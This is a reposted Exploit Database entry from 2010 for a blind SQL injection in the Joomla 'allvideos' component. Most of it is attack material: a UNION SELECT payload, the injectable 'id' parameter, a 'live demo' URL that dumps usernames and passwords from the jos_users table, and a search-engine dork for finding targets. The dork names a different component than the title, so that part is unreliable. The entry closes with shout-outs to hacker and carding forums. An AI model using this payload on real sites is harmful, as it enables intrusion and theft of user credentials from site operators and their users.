Joomla! Component allvideos – Blind SQL Injection

• Exploit Database
• 9 阅读

• 作者： bumble_be
  日期： 2010-04-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12137/

• # Exploit Title: joomla component allvideos BLIND SQL injection Vulnerability 
  # Date: 09 april 2010
  # Author: bumble_be
  # Software Link: N/A
  # Tested on: Windows XP 2
  
  ======================================================================
  [x] author : bumble_be (iogi89@ymail.com)
  [x] dork : inurl:option=com_huruhelpdesk
  [x] myweb: http://linggau-haxor.com
  ======================================================================
  
  ==== SQLI EXPLOIT ====
  /**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12--
  
  
  
  ==== VULN IN HERE ====
  
  http://localhost/xampp/joomla/index.php?option=com_allvideos&id=1339[c0de]
  
  
  
  ==== LIVE DEMO ====
  
  http://localhost/xampp/joomla/index.php?option=com_allvideos&id=1339/**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12+from+jos_users--
  
  
  [x]-------------------------------------------------------------------
  
  GREETZ TO WE FORUM:
  DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID
  
  [x]-------------------------------------------------------------------
  
  MY BROTHA :
  mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
  eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker :)
  
  [x]-------------------------------------------------------------------
  
  note :mulailah sesuatu dengan ucapan bissmillah
  
  [X]-------------------------------------------------------------------
  INDONESIA STILL UP AND WE NOT DEAD :0